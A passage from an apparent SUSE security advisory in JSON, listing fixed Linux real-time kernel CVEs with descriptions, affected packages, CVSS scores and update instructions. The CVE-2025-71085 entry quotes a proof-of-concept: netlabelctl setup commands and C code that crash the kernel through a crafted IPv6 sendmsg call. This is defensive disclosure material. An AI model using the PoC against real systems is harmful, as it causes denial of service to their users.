"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "low"
}
],
"title": "CVE-2025-71080"
},
{
"cve": "CVE-2025-71081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71081"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: stm32: sai: fix OF node leak on probe\n\nThe reference taken to the sync provider OF node when probing the\nplatform device is currently only dropped if the set_sync() callback\nfails during DAI probe.\n\nMake sure to drop the reference on platform probe failures (e.g. probe\ndeferral) and on driver unbind.\n\nThis also avoids a potential use-after-free in case the DAI is ever\nreprobed without first rebinding the platform driver.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71081",
"url": "https://www.suse.com/security/cve/CVE-2025-71081"
},
{
"category": "external",
"summary": "SUSE Bug 1256609 for CVE-2025-71081",
"url": "https://bugzilla.suse.com/1256609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71081"
},
{
"cve": "CVE-2025-71082",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71082"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: btusb: revert use of devm_kzalloc in btusb\n\nThis reverts commit 98921dbd00c4e (\"Bluetooth: Use devm_kzalloc in\nbtusb.c file\").\n\nIn btusb_probe(), we use devm_kzalloc() to allocate the btusb data. This\nties the lifetime of all the btusb data to the binding of a driver to\none interface, INTF. In a driver that binds to other interfaces, ISOC\nand DIAG, this is an accident waiting to happen.\n\nThe issue is revealed in btusb_disconnect(), where calling\nusb_driver_release_interface(\u0026btusb_driver, data-\u003eintf) will have devm\nfree the data that is also being used by the other interfaces of the\ndriver that may not be released yet.\n\nTo fix this, revert the use of devm and go back to freeing memory\nexplicitly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71082",
"url": "https://www.suse.com/security/cve/CVE-2025-71082"
},
{
"category": "external",
"summary": "SUSE Bug 1256611 for CVE-2025-71082",
"url": "https://bugzilla.suse.com/1256611"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71082"
},
{
"cve": "CVE-2025-71083",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71083"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Avoid NULL pointer deref for evicted BOs\n\nIt is possible for a BO to exist that is not currently associated with a\nresource, e.g. because it has been evicted.\n\nWhen devcoredump tries to read the contents of all BOs for dumping, we need\nto expect this as well -- in this case, ENODATA is recorded instead of the\nbuffer contents.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71083",
"url": "https://www.suse.com/security/cve/CVE-2025-71083"
},
{
"category": "external",
"summary": "SUSE Bug 1256610 for CVE-2025-71083",
"url": "https://bugzilla.suse.com/1256610"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71083"
},
{
"cve": "CVE-2025-71084",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71084"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/cm: Fix leaking the multicast GID table reference\n\nIf the CM ID is destroyed while the CM event for multicast creating is\nstill queued the cancel_work_sync() will prevent the work from running\nwhich also prevents destroying the ah_attr. This leaks a refcount and\ntriggers a WARN:\n\n GID entry ref leak for dev syz1 index 2 ref=573\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886\n\nDestroy the ah_attr after canceling the work, it is safe to call this\ntwice.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71084",
"url": "https://www.suse.com/security/cve/CVE-2025-71084"
},
{
"category": "external",
"summary": "SUSE Bug 1256622 for CVE-2025-71084",
"url": "https://bugzilla.suse.com/1256622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "low"
}
],
"title": "CVE-2025-71084"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
},
{
"cve": "CVE-2025-71086",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71086"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: rose: fix invalid array index in rose_kill_by_device()\n\nrose_kill_by_device() collects sockets into a local array[] and then\niterates over them to disconnect sockets bound to a device being brought\ndown.\n\nThe loop mistakenly indexes array[cnt] instead of array[i]. For cnt \u003c\nARRAY_SIZE(array), this reads an uninitialized entry; for cnt ==\nARRAY_SIZE(array), it is an out-of-bounds read. Either case can lead to\nan invalid socket pointer dereference and also leaks references taken\nvia sock_hold().\n\nFix the index to use i.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71086",
"url": "https://www.suse.com/security/cve/CVE-2025-71086"
},
{
"category": "external",
"summary": "SUSE Bug 1256625 for CVE-2025-71086",
"url": "https://bugzilla.suse.com/1256625"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
